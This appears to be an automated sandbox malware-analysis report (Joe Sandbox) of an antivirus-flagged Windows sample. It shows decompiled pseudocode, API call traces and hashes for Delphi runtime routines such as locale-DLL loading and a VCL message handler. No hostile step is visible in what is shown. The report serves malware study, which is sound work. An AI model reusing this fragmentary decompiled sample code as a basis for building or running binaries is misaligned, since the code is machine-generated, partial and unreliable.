                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 52 40142f-401482 call 401388 call 401193 call 4013e4
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E0040142F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				E00401388(_a4, _a8, _a12);
                                                                                                                                                                                                                            				_v12 = __imp____argc;
                                                                                                                                                                                                                            				_push( *__imp___environ);
                                                                                                                                                                                                                            				_push( *__imp____argv);
                                                                                                                                                                                                                            				_push( *_v12); // executed
                                                                                                                                                                                                                            				_t17 = E00401193(); // executed
                                                                                                                                                                                                                            				_v8 = _t17;
                                                                                                                                                                                                                            				E004013E4();
                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memset$getenvsprintf
                                                                                                                                                                                                                            • String ID: L`wL`w$L`wL`w
                                                                                                                                                                                                                            • API String ID: 28789236-2752994358
                                                                                                                                                                                                                            • Opcode ID: f3b84c926ccf0a1bba959a5459d35e4b6dd6d39a1d93bf3ca747a6ef15472332
                                                                                                                                                                                                                            • Instruction ID: 1659f14638985e292583a778dc2b0d47a8a92077a16294103890a8245a3d1bdc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3b84c926ccf0a1bba959a5459d35e4b6dd6d39a1d93bf3ca747a6ef15472332
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F098B5A00308AFCB44DFE8D881D9A77F8BB5C304F1044A9F918DB390E634EA049B54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:4.5%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:13.1%
                                                                                                                                                                                                                            Total number of Nodes:932
                                                                                                                                                                                                                            Total number of Limit Nodes:32
41bd5f 49070->49071 49074 4348a8 49071->49074 49075 4348d3 49074->49075 49076 43497d 49074->49076 49078 4348e3 SendMessageA 49075->49078 49077 4049c0 21 API calls 49076->49077 49079 41bd6c 49077->49079 49080 434901 49078->49080 49081 4348ef 49078->49081 49083 434912 SendMessageA 49080->49083 49092 404ccc 49081->49092 49083->49076 49084 43491e 49083->49084 49087 43492e SendMessageA 49084->49087 49085 4348ff 49086 434959 SendMessageA 49085->49086 49088 434967 49086->49088 49087->49076 49089 434938 49087->49089 49091 434977 SendMessageA 49088->49091 49090 404ccc 35 API calls 49089->49090 49090->49085 49091->49076 49093 404cd0 49092->49093 49101 404c88 49092->49101 49094 404a14 49093->49094 49095 404ce0 49093->49095 49096 404cee 49093->49096 49093->49101 49099 404a84 35 API calls 49094->49099 49103 404a28 49094->49103 49102 404a14 35 API calls 49095->49102 49098 404a84 35 API calls 49096->49098 49097 404a56 49097->49085 49110 404d01 49098->49110 49099->49103 49100 404ccb 49100->49085 49101->49094 49101->49100 49104 404c96 49101->49104 49102->49101 49103->49097 49114 40277c 21 API calls 49103->49114 49106 404cc0 49104->49106 49107 404ca9 49104->49107 49108 40500c 35 API calls 49106->49108 49109 40500c 35 API calls 49107->49109 49112 404cae 49108->49112 49109->49112 49111 404a14 35 API calls 49110->49111 49113 404d2d 49111->49113 49112->49085 49113->49085 49114->49097

Control-flow Graph

C-Code - Quality: 65%
E004061D0(intOrPtr __eax) {
	intOrPtr _v8;
	void* _v12;
	char _v15;
	char _v17;
	char _v18;
	char _v22;
	int _v28;
	char _v289;
	long _t44;
	long _t61;
	long _t63;
	CHAR* _t70;
	CHAR* _t72;
	struct HINSTANCE__* _t78;
	struct HINSTANCE__* _t84;
	char* _t94;
	void* _t95;
	intOrPtr _t99;
	struct HINSTANCE__* _t107;
	void* _t110;
	void* _t112;
	intOrPtr _t113;

	_t110 = _t112;
	_t113 = _t112 + 0xfffffee0;
	_v8 = __eax;
	GetModuleFileNameA(0,  &_v289, 0x105);
	_v22 = 0;
	_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
	if(_t44 == 0) {
		L3:
		_push(_t110);
		_push(0x4062d5);
		_push( *[fs:eax]);
		 *[fs:eax] = _t113;
		_v28 = 5;
		E00406018( &_v289, 0x105);
		if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
			_v22 = 0;
		}
		_v18 = 0;
		_pop(_t99);
		 *[fs:eax] = _t99;
		_push(E004062DC);
		return RegCloseKey(_v12);
	} else {
		_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
		if(_t61 == 0) {
			goto L3;
		} else {
			_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
			if(_t63 != 0) {
				_push(0x105);
				_push(_v8);
				_push( &_v289);
				L0040131C();
				GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
				_t107 = 0;
				if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
					_t70 =  &_v289;
					_push(_t70);
					L00401324();
					_t94 = _t70 +  &_v289;
					while( *_t94 != 0x2e && _t94 !=  &_v289) {
						_t94 = _t94 - 1;
					}
					_t72 =  &_v289;
					if(_t94 != _t72) {
						_t95 = _t94 + 1;
						if(_v22 != 0) {
							_push(0x105 - _t95 - _t72);
							_push( &_v22);
							_push(_t95);
							L0040131C();
							_t107 = LoadLibraryExA( &_v289, 0, 2);
						}
						if(_t107 == 0 && _v17 != 0) {
							_push(0x105 - _t95 -  &_v289);
							_push( &_v17);
							_push(_t95);
							L0040131C();
							_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
							_t107 = _t78;
							if(_t107 == 0) {
								_v15 = 0;
								_push(0x105 - _t95 -  &_v289);
								_push( &_v17);
								_push(_t95);
								L0040131C();
								_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
								_t107 = _t84;
							}
						}
					}
				}
				return _t107;
			} else {
				goto L3;
			}
		}
	}
}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                            • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                                                            • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                                                                            				struct HWND__* _v12;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t161;
                                                                                                                                                                                                                            				struct HWND__* _t162;
                                                                                                                                                                                                                            				struct HWND__* _t163;
                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                            				struct HWND__* _t176;
                                                                                                                                                                                                                            				struct HWND__* _t185;
                                                                                                                                                                                                                            				struct HWND__* _t188;
                                                                                                                                                                                                                            				struct HWND__* _t189;
                                                                                                                                                                                                                            				struct HWND__* _t191;
                                                                                                                                                                                                                            				struct HWND__* _t197;
                                                                                                                                                                                                                            				struct HWND__* _t199;
                                                                                                                                                                                                                            				struct HWND__* _t202;
                                                                                                                                                                                                                            				struct HWND__* _t205;
                                                                                                                                                                                                                            				struct HWND__* _t206;
                                                                                                                                                                                                                            				struct HWND__* _t216;
                                                                                                                                                                                                                            				struct HWND__* _t217;
                                                                                                                                                                                                                            				struct HWND__* _t222;
                                                                                                                                                                                                                            				struct HWND__* _t224;
                                                                                                                                                                                                                            				struct HWND__* _t227;
                                                                                                                                                                                                                            				struct HWND__* _t231;
                                                                                                                                                                                                                            				struct HWND__* _t239;
                                                                                                                                                                                                                            				struct HWND__* _t247;
                                                                                                                                                                                                                            				struct HWND__* _t250;
                                                                                                                                                                                                                            				struct HWND__* _t254;
                                                                                                                                                                                                                            				struct HWND__* _t256;
                                                                                                                                                                                                                            				struct HWND__* _t257;
                                                                                                                                                                                                                            				struct HWND__* _t269;
                                                                                                                                                                                                                            				intOrPtr _t272;
                                                                                                                                                                                                                            				struct HWND__* _t275;
                                                                                                                                                                                                                            				intOrPtr* _t276;
                                                                                                                                                                                                                            				struct HWND__* _t284;
                                                                                                                                                                                                                            				struct HWND__* _t286;
                                                                                                                                                                                                                            				struct HWND__* _t297;
                                                                                                                                                                                                                            				void* _t306;
                                                                                                                                                                                                                            				signed int _t308;
                                                                                                                                                                                                                            				struct HWND__* _t314;
                                                                                                                                                                                                                            				struct HWND__* _t315;
                                                                                                                                                                                                                            				struct HWND__* _t316;
                                                                                                                                                                                                                            				void* _t317;
                                                                                                                                                                                                                            				intOrPtr _t340;
                                                                                                                                                                                                                            				struct HWND__* _t344;
                                                                                                                                                                                                                            				intOrPtr _t366;
                                                                                                                                                                                                                            				void* _t370;
                                                                                                                                                                                                                            				struct HWND__* _t375;
                                                                                                                                                                                                                            				void* _t376;
                                                                                                                                                                                                                            				void* _t377;
                                                                                                                                                                                                                            				intOrPtr _t378;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t317 = __ecx;
                                                                                                                                                                                                                            				_push(_t370);
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t377);
                                                                                                                                                                                                                            				_push(0x459fee);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t378;
                                                                                                                                                                                                                            				 *(_v12 + 0xc) = 0;
                                                                                                                                                                                                                            				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                                                                                                                                                                                                            				if(_t306 < 0) {
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					E004597E8(_v8, _t317, _v12);
                                                                                                                                                                                                                            					_t308 =  *_v12;
                                                                                                                                                                                                                            					_t161 = _t308;
                                                                                                                                                                                                                            					__eflags = _t161 - 0x53;
                                                                                                                                                                                                                            					if(__eflags > 0) {
                                                                                                                                                                                                                            						__eflags = _t161 - 0xb017;
                                                                                                                                                                                                                            						if(__eflags > 0) {
                                                                                                                                                                                                                            							__eflags = _t161 - 0xb020;
                                                                                                                                                                                                                            							if(__eflags > 0) {
                                                                                                                                                                                                                            								_t162 = _t161 - 0xb031;
                                                                                                                                                                                                                            								__eflags = _t162;
                                                                                                                                                                                                                            								if(_t162 == 0) {
                                                                                                                                                                                                                            									_t163 = _v12;
                                                                                                                                                                                                                            									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                                                                                                                                                                                                            									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                                                                                                                                                                                                            										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									L102:
                                                                                                                                                                                                                            									_t166 = 0;
                                                                                                                                                                                                                            									_pop(_t340);
                                                                                                                                                                                                                            									 *[fs:eax] = _t340;
                                                                                                                                                                                                                            									goto L103;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t162 + 0xfffffff2 - 2;
                                                                                                                                                                                                                            								if(_t162 + 0xfffffff2 - 2 < 0) {
                                                                                                                                                                                                                            									 *(_v12 + 0xc) = E0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									L101:
                                                                                                                                                                                                                            									E004598AC(_t377); // executed
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                            								_t176 = _v12;
                                                                                                                                                                                                                            								__eflags =  *(_t176 + 4);
                                                                                                                                                                                                                            								if( *(_t176 + 4) != 0) {
                                                                                                                                                                                                                            									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t185 = _t161 - 0xb01a;
                                                                                                                                                                                                                            							__eflags = _t185;
                                                                                                                                                                                                                            							if(_t185 == 0) {
                                                                                                                                                                                                                            								_t188 = IsIconic( *(_v8 + 0x30));
                                                                                                                                                                                                                            								__eflags = _t188;
                                                                                                                                                                                                                            								if(_t188 == 0) {
                                                                                                                                                                                                                            									_t189 = GetFocus();
                                                                                                                                                                                                                            									_t344 = _v8;
                                                                                                                                                                                                                            									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
                                                                                                                                                                                                                            									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
                                                                                                                                                                                                                            										_t191 = E00451750(0);
                                                                                                                                                                                                                            										__eflags = _t191;
                                                                                                                                                                                                                            										if(_t191 != 0) {
                                                                                                                                                                                                                            											SetFocus(_t191);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t185 == 5;
                                                                                                                                                                                                                            							if(_t185 == 5) {
                                                                                                                                                                                                                            								L89:
                                                                                                                                                                                                                            								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L101;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                            							_t197 =  *(_v8 + 0x44);
                                                                                                                                                                                                                            							__eflags = _t197;
                                                                                                                                                                                                                            							if(_t197 != 0) {
                                                                                                                                                                                                                            								_t372 = _t197;
                                                                                                                                                                                                                            								_t199 = E00441704(_t197);
                                                                                                                                                                                                                            								__eflags = _t199;
                                                                                                                                                                                                                            								if(_t199 != 0) {
                                                                                                                                                                                                                            									_t202 = IsWindowEnabled(E00441704(_t372));
                                                                                                                                                                                                                            									__eflags = _t202;
                                                                                                                                                                                                                            									if(_t202 != 0) {
                                                                                                                                                                                                                            										_t205 = IsWindowVisible(E00441704(_t372));
                                                                                                                                                                                                                            										__eflags = _t205;
                                                                                                                                                                                                                            										if(_t205 != 0) {
                                                                                                                                                                                                                            											 *0x49be6c = 0;
                                                                                                                                                                                                                            											_t206 = GetFocus();
                                                                                                                                                                                                                            											SetFocus(E00441704(_t372));
                                                                                                                                                                                                                            											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                                                                                                                                                                                                            											SetFocus(_t206);
                                                                                                                                                                                                                            											 *0x49be6c = 1;
                                                                                                                                                                                                                            											 *(_v12 + 0xc) = 1;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t161 - 0xb000;
                                                                                                                                                                                                                            						if(__eflags > 0) {
                                                                                                                                                                                                                            							_t216 = _t161 - 0xb001;
                                                                                                                                                                                                                            							__eflags = _t216;
                                                                                                                                                                                                                            							if(_t216 == 0) {
                                                                                                                                                                                                                            								_t217 = _v8;
                                                                                                                                                                                                                            								__eflags =  *((short*)(_t217 + 0x10a));
                                                                                                                                                                                                                            								if( *((short*)(_t217 + 0x10a)) != 0) {
                                                                                                                                                                                                                            									 *((intOrPtr*)(_v8 + 0x108))();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t216 == 0x15;
                                                                                                                                                                                                                            							if(_t216 == 0x15) {
                                                                                                                                                                                                                            								_t222 = E0045A47C(_v8, _t317, _v12);
                                                                                                                                                                                                                            								__eflags = _t222;
                                                                                                                                                                                                                            								if(_t222 != 0) {
                                                                                                                                                                                                                            									 *(_v12 + 0xc) = 1;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L101;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                            							_t224 = _v8;
                                                                                                                                                                                                                            							__eflags =  *((short*)(_t224 + 0x112));
                                                                                                                                                                                                                            							if( *((short*)(_t224 + 0x112)) != 0) {
                                                                                                                                                                                                                            								 *((intOrPtr*)(_v8 + 0x110))();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t227 = _t161 - 0x112;
                                                                                                                                                                                                                            						__eflags = _t227;
                                                                                                                                                                                                                            						if(_t227 == 0) {
                                                                                                                                                                                                                            							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                                                                                                                                                                                                            							__eflags = _t231;
                                                                                                                                                                                                                            							if(_t231 == 0) {
                                                                                                                                                                                                                            								E0045A054(_v8);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__eflags = _t231 == 0x100;
                                                                                                                                                                                                                            								if(_t231 == 0x100) {
                                                                                                                                                                                                                            									E0045A104(_v8);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E004598AC(_t377);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t239 = _t227 + 0xffffffe0 - 7;
                                                                                                                                                                                                                            						__eflags = _t239;
                                                                                                                                                                                                                            						if(_t239 < 0) {
                                                                                                                                                                                                                            							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t239 == 0x1e1;
                                                                                                                                                                                                                            						if(_t239 == 0x1e1) {
                                                                                                                                                                                                                            							_t247 = E004329D8(E004328F8());
                                                                                                                                                                                                                            							__eflags = _t247;
                                                                                                                                                                                                                            							if(_t247 != 0) {
                                                                                                                                                                                                                            								E00432A34(E004328F8());
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L101;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						goto L89;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _t161 - 0x16;
                                                                                                                                                                                                                            					if(__eflags > 0) {
                                                                                                                                                                                                                            						__eflags = _t161 - 0x1d;
                                                                                                                                                                                                                            						if(__eflags > 0) {
                                                                                                                                                                                                                            							_t250 = _t161 - 0x37;
                                                                                                                                                                                                                            							__eflags = _t250;
                                                                                                                                                                                                                            							if(_t250 == 0) {
                                                                                                                                                                                                                            								 *(_v12 + 0xc) = E0045A038(_v8);
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t250 == 0x13;
                                                                                                                                                                                                                            							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000);
											 *(_v8 + 0xa0) = _t314;
											__eflags = _t314;
											if(_t314 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t315 = _t375;
												__eflags = _t375;
												if(_t375 != 0) {
													_t269 =  *(_v12 + 8);
													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x49ebbc; // 0x0
							E00458DEC(_t272);
							E004598AC(_t377);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x49ddb0; // 0x49eb18
							E00445ED0( *_t276, _t317,  *(_v12 + 4));
							E00459840(_v8, _t308, _t317, _v12, _t370);
							E004598AC(_t377);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E004598AC(_t377);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0045973C();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0045974C(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
						case 0:
							0 = E004214B8(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407848();
							__eax = E004598AC(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004598AC(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00459744();
							} else {
								_v8 = E0045974C(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004598AC(__ebp);
							}
							goto L102;
